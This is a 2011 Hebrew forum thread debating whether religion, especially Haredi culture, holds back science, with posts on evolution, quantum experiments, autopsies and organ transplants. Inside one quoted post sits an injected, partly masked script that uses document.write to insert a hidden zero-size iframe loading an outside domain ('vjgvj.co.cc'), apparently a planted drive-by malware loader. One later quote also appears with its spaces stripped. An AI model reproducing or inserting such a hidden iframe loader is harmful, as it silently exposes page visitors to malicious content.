|
|
| נשלח ב-25/9/2011 12:27 |
|
| |
| דינוזאורוס כתב: |  | ??? אתה מתכוין אולי שאם החרדים היו מפנים את מרצם למדע המדע היה מתקדם יותר?
על אותו משקל אני יכול לומר שהמדע עוצר את הדת כי אם איינשטין היה עוסק בהלכה הוא היה מקדם את המקצוע.. |
|
הרבה פעמים הזכרתי כאן את העניין הזה בהפוך, למה לא זכינו שאיינשטיין (וכל היהודים שעסקו במדע בכל הדורות ותרמו למדע ולאנושות) יהיה יהודי יראי שמים ?? האם זה לא באשמתינו ??
|
|
|
|
| נשלח ב-25/9/2011 15:18 |
|
| |
| בישמש כתב: |  | ועכשיו יש שאלה של מציאות: האם הדת מונעת מחקר?
ברור שכן.
צריך דוגמאות? |
|
אתה לא חייב דווקא דוגמאות, יש כלל "אין שקר שלא יתקבל, יש שקר שלא חזרו עליו מספיק", לכן יש לך שתי אפשרויות: לחזור הרבה פעמים על השקר, או להביא דוגמאות.
|
|
|
|
| נשלח ב-25/9/2011 15:32 |
|
| |
אי אפשר לזרוק מילים כמו שקר ושקר ודיי,
ברור היא שתרבות שמטיפה שהיא יודעת את הכול ויש לה תשובות לכל ותתן ותאפשר התקדמות המחקר והמדע,
מה לא ברור לך כאן ??
|
|
|
|
| נשלח ב-25/9/2011 16:52 |
|
| |
| יהיאור כתב: |  | | לעיקר שאלת האשכול. אני עדיין לא מבין, לא מצד המדע ולא מצד הדת, למה מציאות חורים בתיאוריה מדעית אמורה להיות הוכחה למציאות האל, או ששלמות התיאוריה תהיה הוכחה להיפך, |
|
מסכים מאד!
|
|
|
|
| נשלח ב-25/9/2011 17:10 |
|
| |
| מיימוני כתב: |  | רק דבר אחד ממש ממש הפריע לי. לא הבנתי את הניסוי שתארת. לכן לא יכולתי להעריך את הפלאיות שבזהות בין זוית הסיבוב לזוית של המכשיר (לא בטוח לי שציטטתי נכון). אנא. רובנו לא פיזיקאים (מיכי, נדב ועוד כמה כן. אני לא. רוב החרדים כאן לא). איני רוצה לרוץ לחפש בויקי אבל מאד מסקרן אותי מה נחשף בניסוי ומה המפליא שבו. אנא, באר יותר בפעם הבאה. 1
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
ניסיתי לקצר בתיאור, כדי לא להפכו לנקודה העיקרית.
תאר לעצמך שאתה נמצא במקום ללא כח משיכה וללא אוויר, ואתה נוטל חופן סביבונים ומשליך אותם לכוון מסויים. שמים שם מצלמה שנראית כשני לוחות שדרכם עוברים הסביבונים, ומסתבר שהשפיץ של כל אחד מהסביבונים פונה בדיוק כלפי אחד משני הלוחות. עכשיו משנים את הכוון של שני הלוחות, ומתברר ששוב השפיץ של כל הסביבונים פונה בדיוק כלפי אחד משני הלוחות. וכו' וכו'. הדעת נותנת, לכן, ששני הלוחות עצמם מסובבים את שני הסביבונים איכשהו כך שהם פונים כלפי הלוחות - עד כאן זה לא מפתיע. אבל כשבודקים את זה יותר ויותר במדויק - מסתבר שהלוחות אינם מסובבים את הסביבונים, אלא שהסביבונים מראש מסודרים כך - ממש כאילו שהם "מנחשים" מה כוון הלוחות עומד להיות. זה, וניסויים אחרים מראים שבמימדים קטנים מאד, הטבע מתנהג בצורה שונה מאד ולא אינטואיטיבית למי שחי בגדלים שלנו.
|
|
|
|
| נשלח ב-25/9/2011 17:20 |
|
| |
דינו, מותר ללמד סטודנטים לרפואה על גופות של יהודים?
|
|
|
|
| נשלח ב-25/9/2011 17:43 |
|
| |
שוב אכל האתר את תגובתי :-(
תוקן על ידי xibolaiyu ב- 25/09/2011 17:47:26
|
|
|
|
| נשלח ב-25/9/2011 18:01 |
|
| |
שלום דינו, או שלא הבנתי את תגובתך (תמיד אפשרי), או שהיא עולה בקנה אחד עם מה שניסיתי לכתוב לגביו.
| דינוזאורוס כתב: |  |
אתה כותב: "האבולוציה לא באה רק לתאר את ההיסטוריה, מי התפתח ממי, ומתי התפתח. אלא היא באה לייתר התערבות אלהית (לא בתור מגמה ספציפית של מייסדיה, אלא בתור המשמעות של התיאוריה והשימוש בה)" אינני מבין, וזה בדיוק מה שניסיתי לכתוב לגביו. מדוע כשיש תיאוריה שמשליכה לגבי מוצא המין האנושי, תמיד יתפרש הדבר כאילו בהכרח יש לה השלכה לדת? לחלופין, אם דנים באנשים שסבורים כך, מדוע הנטיה היא לקעקע את התיאוריה, במקום לקעקע את ההשלכה לדת?
ומשהו דומה:
"ההגיון האנושי אומר שדבר לא יכול להיות סיבה של עצמו, שאם המציאות התחילה עם חומר מרחב זמן וחוקים, זה לא משהו שיכול לגרום לעצמו להיות. " ממש לא הבנתי. נניח שיש מישהו שחושב שהוא כן מבין זאת, אז אין לו הגיון, או שהגיונו לא אנושי? ומה לגבי מישהו שחושב שהוכחת מכאן שאלהים לא ייתכן, מפני שאם כן אז הוא הסיבה של עצמו? האם אמונה ביצור חסר מסה שמתקיים אינסוף זמן הוא כן חלק אינטגרלי מהגיונו של המין האנושי? פגשת פעם מישהו שממש, אבל ממש, הבין את ההגיון של "הכל צפוי והרשות נתונה"? ברצינות, מהיכן מגיע הצורך הזה שלנו (של כל אחד ואחד מאתנו, במידה זו או אחרת), לקחת את האמונות השרירותיות שלו, ולחשוב שזה ממש תנאי להגיון אנושי?
|
|
 |
|
|
|
|
| נשלח ב-25/9/2011 20:24 |
|
| |
מקסמן
אם הבנתי כעת את כוונתך, אתה מפלפל שתרבות שמטיפה שהיא יודעת הכל, ממילא עוצרת את המחקר, נו טוף.. הדת לא מטיפה שהיא יודעת הכל, ושום מחקר מעשי לא יכול להיעצר בגלל הדת. תרבות שמטיפה שהיא יודעת הכל זו בדיוק תרבות המדעניזם. ואם כוונתך לטיעון הדתי שהמדע לא הסביר את מוצא החיים בצורה טבעית, זה באמת נכון שבזה המדע לא יודע הכל, בכל אופן לחקר האבולוציה בעבר אין שום ערך מדעי, העיסוק בברירה של מינים בהווה, יכול להועיל לתרופות וכדו', אבל אין הוא קשור באמונה שכך באו המינים לעולם. זה הוא עיסוק רפואי חשוב, ולא שמעתי שהדת מתנגדת לו.
ייתכן
הבאת את השאלה של ניתוחי מתים, אבל אולי לא שמת לב שנגעתי בה, והסברתי שמדובר אם בכלל בהתנגשות נקודתית, בדיוק כמו ארגוני בעלי חיים המתנגדים לניסויים בעכברים. ההתנגדות היא לא למדע, אלא לסיטואציה בה מישהו שהוא במקרה איש מדע עובר על ההלכה. אם נניח שיש בכלל צורך בניתוחי מתים, בעידן שלנו בו ההדמייה והתיעוד יכולים ללמד אותך כל דבר על כל דבר באופן מדוייק לחלוטין.
שיבולת
הנושא הוא לא האם האבולוציה באה לשם משהו, כפי שכתבתי לא משנה מה חשב מי שהגה אותה. חשובה לנו יעילותה בדיון על מקומו של האל בעולם כן או לא. כשדנים על האבולוציה כתיאוריה, הפערים לא רלבנטיים לגבי נכונותה של התיאוריה או לאו. פער בתיאוריה מדעית לא קשור לאלהים בשום צורה. תיאוריה מדעית היא נסיון שלנו להבין את היש, נניח שלא הבנו, זה אומר שיש אלהים?
אבל כאשר דנים אם יש אלהים או לאו, ומעלים את מוצא היקום והחיים כהוכחה לקיום אלהים, כאן יש לדון האם האבולוציה כשירה לשמש כהפרכת ההוכחה, כל עוד יש בה פערים משמעותיים.
על זה כתבתי, שהאמונה המסורתית טענה שקיום היקום, החיים, והמינים, לא יכול להיווצר באופן טבעי. זה מוכיח לדעתה שיש כאן מעורבות של עוד כח. כדי להפריך טיעון זה צריכים לספק הסבר שיראה שהדברים כן יכולים להיווצר באופן טבעי. מי שיספק הסבר חלקי, שיכול להסביר רק חלק מהתופעה, לא יבטל את הטיעון הראשון, שעדיין אין לנו הסבר טבעי. זה לא יפריך את החלק אותו הסביר, ייתכן שמוטציות האריכו זנב של שועל, אבל מה שמוטציות לא יכולות לעשות לפי מה שידוע לנו, עדיין משאירי בתוקף את הטיעון הראשון. שיש בעולם דברים שלא יכלו להיווצר באופן טבעי.
החלק של האבולוציה כתיאוריה לא הופרך, היא מסבירה יפה 90% מהתופעות (נניח), אבל ההוכחה לכח אחר מעורב בו, נשארת מה10% הנותרים. זו לא בעיה או הפרכה לאבולוציה, זו פשוט הישארות הטיעון הראשון על כנו. איני מוכיח כלום מהפער באבולוציה, אלא מהתופעות בטבע שאין להם הסבר טבעי.
ניתן לטעון שאולי יהיה להם הסבר טבעי בעתיד, כפי שניתן לטעון לגבי כל הוכחה או טיעון מדעי שהוא, אלא שמכיון שבאותה מדה אולי תהיה להסבר זה או להסברים המקובלים כיום גם פירכא טבעית, הרי חסר טעם לעסוק ב'אולי', והסיכום הוא שלפי המצב הידוע לנו ישנן תופעות ביקום שאינן מוסברות בצורה טבעית.
-לגבי ההגיון האנושי, כמובן שזה נושא לדיון ולהגדרות, רק ציינתי את הדעה הזו כמראה מקום, ולא חשבתי שבשורה אחת מיציתי את הדיון. אבל אני בהחלט חושב שההגיון האנושי הוא נכס של כולנו, כולנו משתמשים בו בחיים, וכשמבהירים את הדיון ואת ההגדרות, אין הרבה ויכוח על מה שאומר ההגיון, הויכוח בדרך כלל הוא על ערכו של ההגיון.
הנושא של הכל צפוי והרשות נתונה לא קשור כלל, אינך רוצה להאמין בבחירה חפשית, זה לא שייך לנדון כאן.
 |
|
|
|
|
| נשלח ב-25/9/2011 22:16 |
|
| |
| דינוזאורוס כתב: |  | | מקסמן אם הבנתי כעת את כוונתך, אתה מפלפל שתרבות שמטיפה שהיא יודעת הכל, ממילא עוצרת את המחקר, נו טוף.. הדת לא מטיפה שהיא יודעת הכל, ושום מחקר מעשי לא יכול להיעצר בגלל הדת. תרבות שמטיפה שהיא יודעת הכל זו בדיוק תרבות המדעניזם. ואם כוונתך לטיעון הדתי שהמדע לא הסביר את מוצא החיים בצורה טבעית, זה באמת נכון שבזה המדע לא יודע הכל, בכל אופן לחקר האבולוציה בעבר אין שום ערך מדעי, העיסוק בברירה של מינים בהווה, יכול להועיל לתרופות וכדו', אבל אין הוא קשור באמונה שכך באו המינים לעולם. זה הוא עיסוק רפואי חשוב, ולא שמעתי שהדת מתנגדת לו. |
|
תראה דינו היקר, לאף אחד (לפחות לעמקן וחושב) לא ממש מעניין תיאוריות מדעיות וזה גם לא אמור להפריע לאף אחד,
מה שמעניין זה מה עושים אנו להיות חברה\אנושות יותר טובה ויותר מועיל אחד מול זולתו, ולהוריד מה שיותר מעול החיים ומעול חוקי הטבע כמו מגיפות וחולי וכדומה, וגם כמובן לדעת את הדרך הנכון לחיות עם הטבע כלומר מה בריא מה לא בריא,
לדעת נכון אייך להקים משפחה ולהתפרנס בכבוד, מהי אומה אייך פועל חברה ואייך אפשר לנהל חברה ואומה על צד היותר טוב, משה רבינו קיבל את עצת יתרו ומותר לנו לקבל או ללמוד ולחקור אייך לנהל אומה וחברה, כמה שיותר קל יהיה החיים ואיכות החינוך וכמובן להיות בריאים,
בקיצור להפוך את עולמינו ליותר טוב, ולנצח ולדורות,
ובזה עוסקים כל הלומדים בעולם חוץ מאיתנו,
מדע הרופאה מתחילה היית (לפי דעות חלק הנביאים) אסור, חזקיהו המלך גנז את ספר הרפואה של שלמה המלך (יכול להיות כי באמת לא היו רלוונטיים, אבל בכל זאת הדרך איך אנו לומדים להבין את מעשיו היא דווקא כי סמכו על הרופא ולא על האלוקים,) חלק מחז"ל בהשקפתם היא שרק נתנו רשות לרופא לרפות,
הכיוון החינוכי (מה שאין כן תלמידי חכם באמת) היא שיש לנו תשובות על הכל ושחז"ל ידעו שהעולם עגול וכדומה בזמן שהתנ"ך לא ידע שהירח היא לא מאור רק מראה,
אז בתכלס אין מצב שבתרבות כזו יצא מישהו שינסה לחקור ולדעת מה ואייך אפשר לפתור אחת ולתמיד את המחלת הסרטן למשל,
רק מה ? היו כל הדורות תלמידי חכמים באמת. שכן עסקו בהם, אבל אנו לא מקבלים אותם כדרך תרבותי להפך אנו נגד,
כלומר זעקת הספורנו מאוד רלוונטי כאן,
אז דינו היקר לא האובולוציה מעניין אותי ולא תורת היחסות של איינשטיין,
מעניין אותי מי האלף בית הפשוט, כמו באיזה צד להשכיב את התינוק שנולד לי אתמול, כלומר אשתי יודעת למשל שאפי' לתינוק בן יומו צריך להטיל ידים כל בוקר משום רוח רע, אבל משום מה לא כתוב בהלכה באיזה צד להשכיב על הבטן או על הגב, וזה שאלה של חיים ומות בתינוקות,
למשל האוכל של שבת הורג אותי, ואני חושב שחלבי יעזור לי יותר ואני הרגיש טוב יותר,
חינוך: למה אני צריך ללמוד ולשמוע מומחים בחינוך שלמדו אצל האומות ומחקריהם, למה אין אצלינו מחקרים כאלה ?
אוכל: אמרתי כבר,
כלכלת המשפחה: למה אין סעיף בשלחן ערוך בעניין, למה אין אצלינו מחקרים ומומחים שלמדו אצלינו (מה שאין כן למדו באומות)
וכן על זו הדרך בכל עניין ועניין,
במה אנו כן עוסקים ? בגנרטור לשבת ! כמה לטול ידים ואיך ? אוקיי את זה לא צריך הרבה להסביר פשוט נכתוב לעשות מקלחת כל בוקר וזהו,
אני אומר דבר פשוט שבכל העולם כהיום לומדים וחוקרים כל עניין ועניין ומזה יש מומחים בכל עניין ועניין, וגם מפתחים שיטות חדשות בכל עניין ועניין וגם טכנולוגיות מפתחים בכל עניין ועניין,
אבל אנחנו ? יודעים הכל לבד ! בכלל יש אלוקים שהוא הבייביסיטר ושלום על ישראל,
ואם נגלה שהעולם עגול אז נאמר שחז"ל ידעו זאת מזמן כבר רק לא גילו לההמון, או שנגלה תרופה לסרטן ?! אז נמצא רמז בחזו"א שידע כבר אז תרופה לסרטן רק לא גילה זאת כי אלוקים לא נתן לו לגלות זאת,
עכשיו באו נראה: לו לא היינו הופכים את התורה שלנו כפי זעקת הספורנו, ואז כל יהודי יראי שמים היה לומד וחוקר ומשתוקק לדעת מהי הדרך הבריאותית ביותר לחיות, מהי הדרך למנוע מגפות, מהי הדרך לרפות מחלות, מהי הדרך לחנך טוב ונכון,
מהי הדרך להקים משפחה ולפרנס אותה,
אז באמת היינו אור לכל הגויים וכמובן בוודאי אור לעצמינו אנו, הרי אנו האומה הכי טובה ואיכותי באמת,
אני אתן לך שאלה פשוטה ששאלתי אצלינו בקהילה ואין לתלמידי החכמים תשובה בעניין אני מדבר על תלמידי חכמים אמתיים,
שאלתי כך: והיות שכסף זה המצאה אנושית, ומשום כך כל נס בכסף (כלומר אם אלוקים יזרוק כסף) בעצם זה גזל של כל כלל האנושות, כלומר אין אפשרות שאלוקים מתערב בעניין,
ואז השאלה אייך הגיע לידך כסף בלי שתעבוד עליו ???
תעשה את התרגיל הזה בקהילה ותראה תוצאות מוזרות ביותר,
אם תוסיף את האיסור לקחת כסף על ללמד תורה, (שזה די מובן כי ללמד תורה הילד לא משיג מזה כלום. לא מקצוע ולא פרנסה בעתיד מלימודו וגם לא אייך לכלכל משפחה,הלימוד וללמד תורה היה צריך להיות חינם, מאב לבנו וכדומה)
ק"ו בן בנו של ק"ו לתת דירות לילדים בלי שידע מנין השיג את הכסף, כלומר מתחילה הוא סומך על רחמים של הזולת שזה בעצם גזל עם אקדח\רחמים, או עם אקדח\בשם הבטחות אלוקיות, כמו תרומה ללומדי תורה יציל את בנו מחולי או יתן לו הצלחה בעסקים. כל זה זה סוג של גזל, כי אמרנו אין כסף בלי עבודה ודם, ושאדם נותן כסף יש סיבה, ומהי הסיבה ?
בוא נבדוק ונראה מהם הסיבות של התורמים ונראה שאין זה כלל השגחה פרטית זה פשות נוכלות של תרבות בורית ועםארצית,
הרי אמרנו אין האלוקים יכול להתערב בהמצאה אנושית שהמציאו לטובתם, וכל התערבות מצידו של האלוקים תוריד את ערך הכסף לשאול, כלומר הלך ערך הכסף ובעצם האלוקים לא עזר לו כלל, להפך הרג אותו ואת זולתו כלכלית,
אז אייך יכול להיות כאן השגחה פרטית ?? על כורחינו שאנו גונבים ולא משנה אייך ובאיזה דרך,
ותחסוך ממני ציטטות של מקורות בעניין, כי זה ממש לא יעזור בעומק של הטיעון,
ולמה אני מספר לך את כל זה: כי כל זה עוצר אותנו להיות משכילים ומלומדים וגם מתוך בורות אנו נהפכים לגנבים וגזלנים ועוד בשם האלוקים ומובטח לנו גן עדן ועולם הבא כי למדנו כל חיינו תורה וקיימנו מצוות התורה,
אנו לא לומדים ולא משכילים מלימודינו באמת בחיי יום יום, מילא לא היה מזיק אבל אנו ראשונים בטכנולוגיות אנו ראשונים שנותנים לילדים חינוך פרטי אנו ראשונים שנותנים דירות לילדים מעשה גבירים,
וכל זה בטענה של השגחה פרטית שלא קיימת בעניין זה כנ"ל,
אותו עניין בתאונות דרכים, תאונות היא שאלה של השגחה ?? לא ולא זה הרג ביודעין ממש על פי תורה ורוח התורה,
תחשוב על ההיתר להרוג שוגג בידי גואל הדם, כמה חמור היא גרימת מוות בשוגג ואותו עניין בהתאבדות עצמית לדעת בכל פעם שנכנסים למכונית, הרי כל יום המכוניות דורשות מאהאנושות מעל 3500 הרוגים ומעל 8000 פצועים,
ולהכניס ילדים למכונית בלי לתת להם את התבונה הזאת שססיסטית יכול להיות שהם לא יחזרו שלמים לבית אם בכלל,
אותו עניין באוכל בריא: האם לא נכון לחקור וללמוד עד שנדע מהי האוכל הטוב והבריא,
למה לתת לנו לגרום כמעט ביודעין לחוסר ידע ומדע ואז נבכה על מחלות וחולי ונזעק לאלוקים שיעזור לנו, איך הוא יכול לעזור לנו בזמן שנתן לנו את התבונה לדעת ולחקור מה טוב לאכול ומה לא, ומשום עצם זה אנו יודעים שזה חוקי האלוקים במילא איך יכול הוא לעזור לנו בהם, הרי זה סתירה, במילא גם בזה אין השגחה פרטית,
ולכן צריך מדע וחקירה, לדעת את דרכיו של האלוקים ואז לא נזעק לשווא,
אבל התרבות שלנו (כת ההשקפה) לא צריך מדע כלל וכלל הרי יש השגחה פרטית, מה הבעיה סרטן ? אוקיי בעוד כמה ימים יום הדין ואז נתפלל שאלוקים ישגיח עלינו שלא יהיה לנו סרטן,
אבל אנו יודעים מתוך התבונה שזה בלתי אפשרי שהאלוקים ימנע כי אם X גורם לסרטן ואני אוכל את X אז האלוקים לא יכול כביכול לעזור לי בזה,
וזה עניין ההבטחה של הרמב"ם שמי שישגיח על הבריאות מובטח לו אריכות ימים, הרי נוכל לשאול מה הרמב"ם לא האמין ביום הדין ? ומי לחיים ומי למוות ?!
יש דבר אחד שצריך לבקש מהאלוקים בכל יום וביום הדין: הברכה הראשונה בתפילה והיא "אתה חונן לאדם דעת ומלמד לאנוש בינה, חנינו מאתך חכמה בינה ודעת,,,,,, אמן ואמן,,,,,,,
לסיכום::
אם כל היהודים בכל הדורות היו לומדים מדע ומחקר, מתחילה לא היית חילון והתבוללות כלל, ולא היינו מחדשים כל יום תורה ודת חדשה,
אז לא רק שעצרנו את המדע האנושית רק גם קיבלנו עונש תבוני של להפוך את תורתינו לדת חדשה ולסבול מעצמינו לעולמים,
ההשכלה התורנית היית מחזיר אותנו לארץ ישראל הרבה שנים יותר מוקדם,
והיום היינו יכולים להיות הראשונים במדע ובחשיבה האנושית כולה במוסר וערכים,
תוקן על ידי maxmen ב- 25/09/2011 22:32:53
|
|
|
|
|
| נשלח ב-25/9/2011 22:42 |
|
| |
| דינוזאורוס כתב: |  | ועכשיויששאלהשלמציאות:האםהדתמונעתמחקר?
ברורשכן.
צריךדוגמאות?
אתהלאחייבדווקאדוגמאות,ישכלל"איןשקרשלאיתקבל,יששקרשלאחזרועליומספיק",לכןישלךשתיאפשרויות:לחזורהרבהפעמיםעלהשקר,אולהביאדוגמאות. |
|
|
|
|
|
| נשלח ב-25/9/2011 22:44 |
|
| |
| דינוזאורוס כתב: |  | אולי לא הבנתי משהו. כתבתי "אינני מבין, וזה בדיוק מה שניסיתי לכתוב לגביו. מדוע כשיש תיאוריה שמשליכה לגבי מוצא המין האנושי, תמיד יתפרש הדבר כאילו בהכרח יש לה השלכה לדת? לחלופין, אם דנים באנשים שסבורים כך, מדוע הנטיה היא לקעקע את התיאוריה, במקום לקעקע את ההשלכה לדת?" ומה התשובה שלך? "אבל כאשר דנים אם יש אלהים או לאו, ומעלים את מוצא היקום והחיים כהוכחה לקיום אלהים, כאן יש לדון האם האבולוציה כשירה לשמש כהפרכת ההוכחה, כל עוד יש בה פערים משמעותיים. על זה כתבתי, שהאמונה המסורתית טענה שקיום היקום, החיים, והמינים, לא יכול להיווצר באופן טבעי." כלומר, התשובה שלך, למיטב הבנתי היא, כן, כל תיאוריה על הווצרותי היא בעלת השלכה לדת בפרשנות שלי (או שסתם לא בא לי להתייחס למה שאתה כותב), אבל מצבי בסדר, כי האבולוציה עדיין מלאת בעיות. נו, אז תודה לך על זמנך, ואני מאחל לך הצלחה באשכול שלך על טמטומו של צבי ינאי. ------------- ואגב: "הנושא של הכל צפוי והרשות נתונה לא קשור כלל, אינך רוצה להאמין בבחירה חפשית, זה לא שייך לנדון כאן." אינני מחפש לריב, וזו שאלה רצינית: זה באמת נובע איכשהו ממשהו שכתבתי? |
|
תוקן על ידי xibolaiyu ב- 25/09/2011 22:47:18
 |
|
|
|
|
| נשלח ב-25/9/2011 23:25 |
|
| |
| מיימוני כתב: |  | ... לכן לא יכולתי להעריך את הפלאיות שבזהות בין זוית הסיבוב לזוית של המכשיר (לא בטוח לי שציטטתי נכון) ....
|
|
מיימוני, הצלחתי במשהו להסביר את עוצם הפלאיות שבדבר? זה פשוט מדהים איך העולם הפצפון מתנהג בצורה שונה לחלוטין מהעולם שאנו רואים (ובאופן שקול: מדהים לחלוטין איך אוסף התנהגויות כ"כ ביזארי עפ"י תפיסתנו מתכנס סטאטיסטית בהכרח להתנהגות מהסוג שאנו מכירים). חבל לא להתפעל מהעניין רק בשל יכולת ההסבר (ואולי ההבנה) המוגבלים שלי. אם לא, אנא כתוב ואחפש מקור שמתוכו אפשר להסביר בצורה טובה יותר.
תוקן על ידי xibolaiyu ב- 25/09/2011 23:27:02
|
|
|
|
| נשלח ב-25/9/2011 23:53 |
|
| |
כתבתי תגובה עם כמה דוגמאות לעצירת מחקר עקב דת והאתר אכל את הפוסט שלי. אחזור בקצרה:
1) השתלות לב. בתחילה - כל הרבנים אסרו (רצח של התורם והמקבל). עקב כך שהיו רופאים שלא הקשיבו (או כלל לא שמעו כי הם לא יהודים) המדע התפתח וכיום אנחנו יכולים ממש להציל חיים עם השתלות. (אני לא נכנס לדיון האם זה היה שווה האם היה אתי וכו' - אני רק מראה שההתקדמות היתה נעצרת עקב הדת).
2) חקר אנטומיה ע"י ניתוחי מתים - זה היה ראשית מדע הרפואה - ולפי דת אסור.
|
|
|
|
| נשלח ב-25/9/2011 23:58 |
|
| |
שיבולת איני יודע על מה אתה זועם
לא טענתי שהאבולוציה קשורה לנושא דתי, אמרתי שאין הצדקה לטעון נגדה מפערים כל עוד הדיון הוא מדעי, אבל יש הצדקה לשלול את העלאת האבולוציה כפתרון למוצא החיים בויכוח דתי.
מסכים או לא?
מה שכתבת שיש לקעקע את ההשלכה לדת במקום את התיאוריה, נראה לי שחלק מהתיאוריה של האבולוציה היא שהכל תהליך טבעי, וזה עצמו נוגד את הדת כפי שמבינים אותה רבים (אם כי לא כולם כנודע).
ובנוגע לבחירה, גם לא זכיתי להבין, אתה טענת ש'הכל צפוי והרשות נתונה' זו בעיה, מוכרת כמובן. ועל זה אמרתי, שמציאות האל לא מחייבת שהרשות נתונה, מי שקשה לו יוכל להניח שאין בחירה, דהיינו שאין הרשות נתונה.
קראתי שוב את דבריך, וראיתי שאפשר לפרש אותם בעוד צורה. טוב, זה היה קצר.
|
|
|
|
|